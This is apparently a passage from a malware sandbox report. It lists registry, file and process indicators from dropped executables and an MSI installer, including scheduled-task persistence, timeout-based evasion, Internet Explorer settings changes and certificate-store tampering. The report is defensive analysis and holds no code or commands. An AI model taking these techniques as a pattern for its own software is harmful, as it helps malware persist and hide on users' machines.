File opened for modification C:\Windows\Installer\MSID139.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3761.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI44BA.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB484.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICA93.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA16F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI25E1.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f799f5d.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f799f5b.msi C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19c6762a08beae.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19c6762a08beae.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19c6762a08beae.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e6a852f849bb2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\7535ac09-7701-4fd9-972f-2396592d31c2\build2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\7535ac09-7701-4fd9-972f-2396592d31c2\build2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\436C.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\436C.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e6a852f849bb2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\de-DE = "de-DE.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "338157915" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 801523884da7d701 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca00000000020000000000106600000001000020000000782ba1f3aa90fd7e10b4dc93303388da72fe5af5e0f7e12316542d5a9b57d224000000000e80000000020000200000002cad164c48eb18faa8530b2be05c8b4382f8dec526b78d06cce62e2c5b8f55c520000000ce092c90e0324af6ea097eb41d3207a0e6c571c2a221ec6adf582f0fcfe9b7e2400000005f0bde2d97c949b5f0021f75eca3978e65023225931a55c69a50cb8c0c2b86be96d7c3e41fc594c94360572484556a0ac461b1b1bf11cde7f3626a21cad34756 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca0000000002000000000010660000000100002000000006640020aed2c9635ab883cc34e7cdb94528533433465ab46d4dd32267a972ea000000000e80000000020000200000009947e094e6911cdb4fe0a984e1a80462c2e93733b88aef9dc468782aabba4cf2900000004f4ab3c88f6e67fd512da3a6e50f7a7393d0d6960a12bd7b33ae60ec8b4e8d28b07b751f3b235b1d5aa88a3665fa2e18d132e701617b4161ed318f04681f99001a98d454b5960aa2616ac433a0e27374de719919358b915576c97179166d67969eafa76f3b53e858807f996ac0c19f59d0e3cb487bb183fce4015d49dd6041401049502888043cdd1b66125779d259be400000004fcb33bc2f8438ac74d51adb2aba97d71939d34cfb65ce7613044ce6974b39fe2021dc371ea50d935ac14c4c0a07de908007e0b5d4916089df00d452966d097c C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8CE27E90-1340-11EC-A847-FA95CBBE371C} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
